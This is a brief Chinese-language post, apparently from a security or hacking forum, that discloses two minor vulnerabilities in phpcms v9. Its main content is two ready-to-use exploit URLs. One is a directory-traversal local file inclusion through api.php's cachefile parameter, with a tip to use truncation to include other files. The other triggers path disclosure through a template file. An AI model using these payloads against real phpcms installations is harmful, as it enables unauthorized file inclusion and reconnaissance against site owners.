phpcms v9两个鸡肋漏洞

我就不贴代码了，有兴趣的自己跟一下吧，说不定可以发现更多。

#包含根目录的fuck.cache.php 又一鸡肋。包含其他文件自己截断吧，看你运气了。
Exp: http://www.php0day.com/api.php?op=get_menu&act=ajax_getlist&callback=alert&path=b4dboy&cachefile=../../../fuck

#暴路径
Exp: http://www.php0day.com/phpcms/modules/attachment/templates/album_dir.tpl.php?author=b4dboy